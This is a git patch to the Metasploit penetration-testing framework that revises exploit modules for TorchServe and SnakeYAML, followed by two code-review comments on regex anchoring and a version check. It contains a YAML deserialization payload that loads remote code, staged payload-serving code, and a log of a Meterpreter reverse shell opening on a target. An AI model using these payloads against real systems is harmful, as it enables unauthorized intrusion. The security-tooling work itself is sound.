From 86b7ec451843364de8440581d1da62c5dd9faa4a Mon Sep 17 00:00:00 2001
From: Spencer McIntyre
Date: Wed, 11 Oct 2023 16:56:20 -0400
Subject: [PATCH] Address comments from the review
---
 .../multi/http/torchserver_cve_2023_43654.md | 9 +++++----
 .../CVE-2022-1471/MyScriptEngineFactory.java | 2 +-
 external/source/exploits/CVE-2022-1471/README.md | 16 ++++++++++++----
 .../exploit/remote/java/http/class_loader.rb | 9 +++++----
 .../multi/http/torchserver_cve_2023_43654.rb | 5 ++++-
 5 files changed, 27 insertions(+), 14 deletions(-)
diff --git a/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md b/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md
index 76322ad34962..c08d772e568b 100644
--- a/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md
+++ b/documentation/modules/exploit/multi/http/torchserver_cve_2023_43654.md
@@ -33,20 +33,21 @@ PAYLOAD => java/meterpreter/reverse_tcp
 msf6 exploit(multi/http/torchserver_cve_2023_43654) > set LHOST 192.168.159.128
 LHOST => 192.168.159.128
 msf6 exploit(multi/http/torchserver_cve_2023_43654) > run
+
 [*] Started reverse TCP handler on 192.168.159.128:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 0.8.1 is vulnerable.
-[*] Using URL: http://192.168.159.128:9090/exploit/
+[*] Using URL: http://192.168.159.128:9090/VLz5xafKtJOjBAv/
 [*] Registering the model archive...
 [+] Sending model archive
-[*] Sending stage (59909 bytes) to 172.17.0.2
-[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 172.17.0.2:39480) at 2023-10-05 16:13:54 -0400
+[*] Sending stage (57692 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.2:49662) at 2023-10-12 09:19:30 -0400
 [*] Server stopped.
 meterpreter > getuid
 Server username: model-server
 meterpreter > sysinfo
-Computer : 4dbcfe5cc11c
+Computer : 187de8da4e1b
 OS : Linux 6.2.15-100.fc36.x86_64 (amd64)
 Architecture : x64
 System Language : en_US
diff --git a/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
index da5e382547af..c02184045e5c 100644
--- a/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
+++ b/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
@@ -1,4 +1,4 @@
-// javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java
+// javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java
 import javax.script.ScriptEngine;
 import javax.script.ScriptEngineFactory;
 import java.io.IOException;
diff --git a/external/source/exploits/CVE-2022-1471/README.md b/external/source/exploits/CVE-2022-1471/README.md
index a46db950d221..1a1450053ec8 100644
--- a/external/source/exploits/CVE-2022-1471/README.md
+++ b/external/source/exploits/CVE-2022-1471/README.md
@@ -1,17 +1,25 @@
 # Overview
-The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded while exploit
-CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
+The Java file contained within will load and execute a Metasploit payload. It's intended to be loaded as part of the
+exploit for CVE-2022-1471 which is a YAML deserialization vulnerability within the snakeyaml project.
+
+See https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in for more information.
 ## Compiling
-Compile the Java source file using `javac -cp path/to/metasploit-payloads/data/java MyScriptEngineFactory.java`.
+It's necessary to specify the Metasploit Payloads data directory as the class path when compiling the code. See the
+[metasploit-payloads][1] repository for instructions on how to compile the main Java payloads and install the data
+files.
+
+Compile the Java source file using `javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java`.
 ## Usage
 Trigger the deserialization using the following YAML:
 ```yaml
-!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://1.1.1.1:8080/"]]]]
+!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://192.0.2.1:8080/"]]]]
 ```
 Host the compiled class on an HTTP server along with the file `/META-INF/services/javax.script.ScriptEngineFactory`.
 The contents of this file should simply be the class name to load (`MyScriptEngineFactory`). See Metasploit's
 `Msf::Exploit::Remote::Java::HTTP::ClassLoader` mixin for more information and the remaining components necessary to
 deliver a Metasploit payload.
+
+[1]: https://github.com/rapid7/metasploit-payloads/tree/master/java
diff --git a/lib/msf/core/exploit/remote/java/http/class_loader.rb b/lib/msf/core/exploit/remote/java/http/class_loader.rb
index 0af49e19d130..a953a09b6877 100644
--- a/lib/msf/core/exploit/remote/java/http/class_loader.rb
+++ b/lib/msf/core/exploit/remote/java/http/class_loader.rb
@@ -63,21 +63,22 @@ def on_request_uri(cli, request)
 case resource
 # Stage 1
 when "#{class_name}.class"
- vprint_good('Sending constructor class')
+ vprint_good('Sending the constructor class')
 # This contains the constructor that will call our JavaPayload
 res = constructor_class
 # Stage 2
 when 'metasploit/Payload.class'
- vprint_good('Sending payload class')
+ vprint_good('Sending the main payload class')
 # This is our JavaPayload as a compiled class
 res = MetasploitPayloads.read('java/metasploit/Payload.class')
 # Stage 3
 when 'metasploit.dat'
- vprint_good('Sending payload config')
+ vprint_good('Sending the payload configuration data')
 # This tells the target how to address the payload; this is the magic!
 res = payload_instance.stager_config
 # (Optional) Stage 4 data for unstaged payloads such as java/shell_reverse_tcp
- when /^javapayload\/stage\/(Shell|Stage|StreamForwarder)\.class$/
+ when /^javapayload\/stage\/(?:Shell|Stage|StreamForwarder)\.class$/
+ vprint_good("Sending additional payload class: #{resource}")
 res = MetasploitPayloads.read("java/#{resource}")
 else
 vprint_error('Sending 404')
diff --git a/modules/exploits/multi/http/torchserver_cve_2023_43654.rb b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
index baf23a7efa1a..794d11c00625 100644
--- a/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
+++ b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
@@ -70,7 +70,8 @@ def check
 end
 version = res.get_json_document.dig('info', 'version')
- return Exploit::CheckCode::Safe unless version.present?
+ return Exploit::CheckCode::Detected unless version.present?
+
 unless Rex::Version.new(version) < Rex::Version.new('8.0.2')
 return Exploit::CheckCode::Safe("Version #{version} is patched.")
 end
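Review bot: The stage-4 `when` regex still anchors with `^` and `$`, which in Ruby match at line boundaries rather than the ends of the string, so a `resource` value carrying an embedded newline could satisfy the match on one line while the whole value is interpolated into `MetasploitPayloads.read("java/#{resource}")` on the next. Whether the request path can reach this branch with a newline in it depends on how `resource` is derived earlier in `on_request_uri`, which begins before this hunk, but whole-string anchors cost nothing and make the read path provably one of the three listed class files: `when %r{\Ajavapayload/stage/(?:Shell|Stage|StreamForwarder)\.class\z}`, which also drops the escaped slashes. The method continues past the end of the hunk.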
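Review bot: The threshold on the context line `unless Rex::Version.new(version) < Rex::Version.new('8.0.2')` looks transposed: the documentation hunk in this same commit reports `Version 0.8.1 is vulnerable`, and TorchServe releases are 0.x, so with '8.0.2' every release below 8.0.2 is reported vulnerable; if the fixed release is 0.8.2, the literal should read `Rex::Version.new('0.8.2')`. Separately, the new `Detected` return only covers a missing version; if Rex::Version follows Gem::Version here, a string that is not a version raises ArgumentError out of `check` instead of producing a CheckCode, which `return Exploit::CheckCode::Detected unless version.present? && Rex::Version.correct?(version)` would cover, assuming the class method is inherited. `check` begins before this hunk.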
@@ -144,6 +145,8 @@ def exploit
 def cleanup
 super
+ return unless @model_name
+
 # see: https://pytorch.org/serve/management_api.html#unregister-a-model
 send_request_cgi({
 'method' => 'DELETE',